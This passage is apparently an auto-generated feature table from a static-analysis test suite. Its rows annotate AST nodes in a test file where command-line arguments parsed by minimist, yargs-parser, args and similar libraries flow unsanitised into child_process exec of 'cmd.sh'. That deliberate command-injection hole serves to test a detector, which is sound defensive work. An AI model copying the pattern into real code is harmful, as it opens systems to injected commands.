autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | exceptional return of process ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | exceptional return of process ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | process ... lice(2) | CalleeFlexibleAccessPath | yargsParser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | process ... lice(2) | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | process ... lice(2) | calleeImports | yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | process ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | process ... lice(2) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | process ... lice(2) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | process ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | process ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:42:85:45 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:42:85:45 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:42:85:45 | argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:42:85:45 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:42:85:45 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:47:85:51 | slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:47:85:51 | slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:47:85:51 | slice | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:47:85:51 | slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:47:85:51 | slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:53:85:53 | 2 | CalleeFlexibleAccessPath | process.argv.slice | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:53:85:53 | 2 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:53:85:53 | 2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:53:85:53 | 2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:53:85:53 | 2 | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:53:85:53 | 2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:53:85:53 | 2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:57:85:59 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:57:85:59 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:57:85:59 | foo | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:57:85:59 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:57:85:59 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:2:87:24 | import ... 'args' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:2:87:24 | import ... 'args' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:2:87:24 | import ... 'args' | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:2:87:24 | import ... 'args' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:2:87:24 | import ... 'args' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:9:87:12 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:19:87:24 | 'args' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:19:87:24 | 'args' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:87:19:87:24 | 'args' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:10 | flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:10 | flags | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:10 | flags | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:10 | flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:10 | flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:37 | flags | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:37 | flags | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:37 | flags | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:37 | flags | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:37 | flags | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:37 | flags = ... s.argv) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:37 | flags = ... s.argv) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:37 | flags = ... s.argv) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:37 | flags = ... s.argv) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:6:88:37 | flags = ... s.argv) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:17 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:17 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:17 | args | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:17 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:17 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:23 | args.parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:23 | args.parse | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:23 | args.parse | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:23 | args.parse | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:23 | args.parse | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | args.pa ... s.argv) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | args.pa ... s.argv) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | args.pa ... s.argv) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | args.pa ... s.argv) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | args.pa ... s.argv) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | exceptional return of args.pa ... s.argv) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | exceptional return of args.pa ... s.argv) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | exceptional return of args.pa ... s.argv) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | exceptional return of args.pa ... s.argv) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | exceptional return of args.pa ... s.argv) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:19:88:23 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:19:88:23 | parse | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:19:88:23 | parse | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:19:88:23 | parse | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:19:88:23 | parse | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:31 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:31 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:31 | process | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:31 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:31 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:36 | process.argv | CalleeFlexibleAccessPath | args.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:36 | process.argv | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:36 | process.argv | calleeImports | args | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:36 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:36 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:36 | process.argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:36 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:36 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:25:88:36 | process.argv | receiverName | args | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:33:88:36 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:33:88:36 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:33:88:36 | argv | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:33:88:36 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:33:88:36 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:3 | cp | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:8 | cp.exec | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | cp.exec ... gs.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | cp.exec ... gs.foo) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | cp.exec ... gs.foo) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | cp.exec ... gs.foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | cp.exec ... gs.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | exceptional return of cp.exec ... gs.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | exceptional return of cp.exec ... gs.foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | exceptional return of cp.exec ... gs.foo) | enclosingFunctionBody | argv process argv slice 2 minimist require minimist cp exec cmd.sh minimist argv foo subarg require subarg cp exec cmd.sh subarg process argv slice 2 foo yargsParser require yargs-parser cp exec cmd.sh yargsParser process argv slice 2 foo args args flags args parse process argv cp exec cmd.sh flags foo flags require arg spec cp exec cmd.sh flags foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | exceptional return of cp.exec ... gs.foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | exceptional return of cp.exec ... gs.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| 